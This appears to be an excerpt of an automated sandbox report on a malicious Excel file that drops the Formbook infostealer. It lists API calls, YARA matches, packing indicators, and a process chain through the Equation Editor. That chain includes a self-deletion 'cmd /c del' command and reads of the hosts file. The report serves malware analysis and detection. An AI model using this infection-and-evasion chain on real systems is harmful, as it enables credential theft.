          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_001181B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00118260 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_001182E0 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00118390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_001182AC NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011838B NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E1829
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E68B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E3168
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E2250
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EBAD8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0470
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0F98
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E6FA8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E4070
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E3068
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001ED898
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E4080
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E68A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5178
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5188
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E53D1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E53E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E1CF2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EC570
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5618
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5628
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0F0C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EB758
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EDF48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E6F97
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022B4B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00229250
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00221B20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00226BF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022D510
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022D9A8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00221260
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022CEB8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022D730
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022C338
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D02880
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D0408A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D04E40
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D06084
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03850
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03840
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D00048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D06048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D02870
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D00012
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D04DE0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03188
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D099A9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03148
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D06690
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D0669B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D066A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D097DC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D09380
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D02B38
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D02B28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8B1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B963
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B496
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C539
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D89
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CE85
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF12
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C795
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00933040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009563DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00932305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00937353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00965485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00941489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00976540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00934680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009657C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009329B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009469FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00957B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00960D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00962E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00940F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095DF7C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007C905A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B3040
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007DD005
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007AE0C6
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007AE2E9
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00851238
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007FA37B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B7353
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_008563BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B2305
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007D63DB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007AF3CF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007ED47D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0083443E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007C1489
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007E5485
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007F6540
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B351F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007CC5F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007FA634
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00852622
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007BE6C1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B4680
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0083579A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007E57C3
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007BC7BC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007D286D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007BC85C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0084F8EE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0085098E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007C69FE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0083394B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B29B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00835955
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00863A83
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0085CBA4
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0083DBDA
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007D7B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007AFBD7
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007BCD5B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007E0D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0084FDDD
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007CEE4C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007E2E2F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007DDF7C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0084CFB1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007C0F3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00822FDC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B493
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B496
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011C539
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011C795
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B8B1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B954
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00108C50
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00108C4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00102D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00102D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011CE85
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011BF12
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00102FB0
          Source: Processed APR12.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 0099F970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00973F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092DF5C appears 114 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 007F3F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 007ADF5C appears 119 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 007F373B appears 245 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0081F970 appears 84 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 007AE2A8 appears 38 times
          Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: xles[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/11@9/9
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Processed APR12.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR10F1.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Processed APR12.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Processed APR12.xlsxStatic file information: File size 2693120 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp
          Source: Processed APR12.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Processed APR12.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_012030AB push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_01202BC7 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E74DF push B9FFFFFEh; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002200C8 push esp; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00222B53 push ebx; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D09AC9 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B2A2 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415414 push esp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F46 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415FC5 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_012030AB push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_01202BC7 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B3FB push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00115414 push esp; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011B45C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0011BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00114F46 push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00115FC5 push ebp; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.47179869849
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
